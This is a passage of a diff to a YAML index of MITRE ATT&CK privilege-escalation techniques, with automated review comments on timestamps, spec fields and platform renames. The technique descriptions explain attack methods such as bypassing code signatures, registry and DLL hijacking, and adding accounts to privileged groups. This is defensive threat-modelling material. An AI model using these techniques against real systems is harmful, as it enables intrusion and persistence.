x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.007:
technique:
@@ -15570,7 +15841,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.013:
technique:
@@ -15658,7 +15928,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.013
atomic_tests: []
T1543:
@@ -15743,7 +16012,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546.006:
technique:
@@ -15775,7 +16043,7 @@ privilege-escalation:
Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.(Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.
Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.(Citation: Malware Persistence on OS X)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T17:08:21.101Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: LC_LOAD_DYLIB Addition
x_mitre_detection: Monitor processes for those that may be used to modify binary
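Review bot: the `modified` timestamp for T1546.006 moves backwards, from `2022-05-11T14:00:00.188Z` to `2022-04-20T17:08:21.101Z`; the same regression appears for T1548.002, T1548.003, T1547.014, T1055.003, T1546.011 and T1037.002 further down. A `modified` value going back in time usually means the index was regenerated from a different source bundle rather than a newer one (note that every old value shares the artificial `14:00:00.188Z` time), so please state which ATT&CK STIX release the generator now reads so reviewers can verify these are the authoritative timestamps.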
@@ -15798,11 +16066,10 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053.007:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:26:03.731Z'
name: Kubernetes Cronjob
description: |-
Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -15860,14 +16127,13 @@ privilege-escalation:
url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.007
atomic_tests: []
T1548.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:35:39.112Z'
name: 'Abuse Elevation Control Mechanism: Bypass User Account Control'
description: |-
Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
@@ -15968,7 +16234,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1548.002
atomic_tests: []
T1548.003:
@@ -15999,7 +16264,7 @@ privilege-escalation:
description: Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually
Does. Retrieved March 19, 2018.
source_name: cybereason osx proton
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-14T16:28:19.781Z'
name: 'Abuse Elevation Control Mechanism: Sudo and Sudo Caching'
description: |-
Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
@@ -16033,13 +16298,11 @@ privilege-escalation:
- User
x_mitre_effective_permissions:
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1548.003
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
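Review bot: T1548.003 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` in this hunk and nothing is added in their place, unlike T1574.011 (where `x_mitre_attack_spec_version: 3.2.0` is re-added later in the object) or T1053.003; the same double removal happens for T1055.003 and T1546.011 below. If the full object now has no spec version field at all, that looks like a missed field rather than a deliberate bump; check the complete object and, if the field is really gone, add `x_mitre_attack_spec_version` with the value the source bundle carries.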
@@ -16058,7 +16321,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -16072,7 +16334,6 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -16099,8 +16360,8 @@ privilege-escalation:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -16131,12 +16392,13 @@ privilege-escalation:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1547:
technique:
- modified: '2024-04-16T12:26:07.945Z'
+ modified: '2024-09-12T15:27:58.051Z'
name: Boot or Logon Autostart Execution
description: |-
Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel.
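Review bot: the `x_mitre_attack_spec_version` and `x_mitre_modified_by_ref` lines added here for T1574.011 are the same keys removed from the object in the two hunks above (`- x_mitre_attack_spec_version: 2.1.0` after the kill chain phases and `- x_mitre_modified_by_ref` before `x_mitre_platforms`), so the only content change is the version value `2.1.0` to `3.2.0`; having the generator emit keys in a stable order would reduce diffs like this to the single-line change they really are.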
@@ -16208,9 +16470,9 @@ privilege-escalation:
2017.
url: https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx
- source_name: Microsoft Run Key
- description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa376977
+ description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys
- source_name: Microsoft TimeProvider
description: Microsoft. (n.d.). Time Provider. Retrieved March 26, 2018.
url: https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx
@@ -16226,12 +16488,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547
atomic_tests: []
T1547.014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-22T14:17:17.353Z'
name: Active Setup
description: |-
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.
@@ -16306,12 +16567,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.014
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -16331,9 +16591,14 @@ privilege-escalation:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -16353,9 +16618,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
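Review bot: T1484.002's `x_mitre_platforms` replaces `Azure AD` and `SaaS` with `Identity Provider`, and the T1098.003 hunk below does the same for `Office 365`, `Google Workspace` and `Azure AD` (replaced by `Office Suite` and `Identity Provider`). Any consumer that filters on the old platform names, including per-platform index files, will silently drop these techniques; confirm that all platform-specific indexes were regenerated with the new names in the same change.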
@@ -16372,6 +16636,10 @@ privilege-escalation:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -16405,7 +16673,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests: []
T1543.003:
@@ -16561,31 +16828,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.003
atomic_tests: []
T1053.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -16602,6 +16849,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -16612,9 +16860,13 @@ privilege-escalation:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -16622,13 +16874,29 @@ privilege-escalation:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
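Review bot: the block added at the end of T1053.003 (`type`, `id`, `created`, `created_by_ref`, `external_references`, `object_marking_refs`) is the same content removed from the head of the object in the T1053.003 hunk above, so the real changes are `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`, the new `revoked: false` and `x_mitre_remote_support: false` fields, and `url`/`external_id` swapping order inside the mitre-attack reference. The dropped `spec_version: '2.1'` matches the rest of the patch; as with T1574.011, stable key ordering in the generator would make this object's diff reviewable at a glance.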
@@ -16658,6 +16926,7 @@ privilege-escalation:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -16668,6 +16937,7 @@ privilege-escalation:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -16676,13 +16946,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
@@ -16724,9 +16994,6 @@ privilege-escalation:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -16794,19 +17061,18 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -16822,8 +17088,8 @@ privilege-escalation:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -16837,7 +17103,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -16863,6 +17129,10 @@ privilege-escalation:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
@@ -16890,12 +17160,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -16921,7 +17190,7 @@ privilege-escalation:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -16963,7 +17232,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -17041,11 +17309,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -17125,7 +17392,77 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.003:
technique:
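Review bot: the new T1098.007 entry ends with `atomic_tests: []` but has no `identifier:` line, whereas neighbouring entries such as T1053.005, T1546.013, T1053.007 and T1098.003 carry `identifier: <id>` immediately before `atomic_tests`; some entries already lack it (T1037, T1574.007), so if the key is meaningful to consumers add `identifier: T1098.007` here, and if it is not, consider removing it everywhere for consistency. Separately, `x_mitre_detection: ''` together with the empty `atomic_tests` list means this sub-technique (group membership changes via `net localgroup`, `net group` and `usermod`) has no test or detection guidance yet; the listed data source `User Account: User Account Modification` is the natural starting point for a follow-up detection test.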
@@ -17148,7 +17485,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:22:50.800Z'
name: Thread Execution Hijacking
description: "Adversaries may inject malicious code into hijacked processes
in order to evade process-based defenses as well as possibly elevate privileges.
@@ -17196,8 +17533,6 @@ privilege-escalation:
- Anti-virus
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.003
atomic_tests: []
T1546.011:
@@ -17229,7 +17564,7 @@ privilege-escalation:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
@@ -17284,13 +17619,11 @@ privilege-escalation:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
@@ -17351,9 +17684,9 @@ privilege-escalation:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
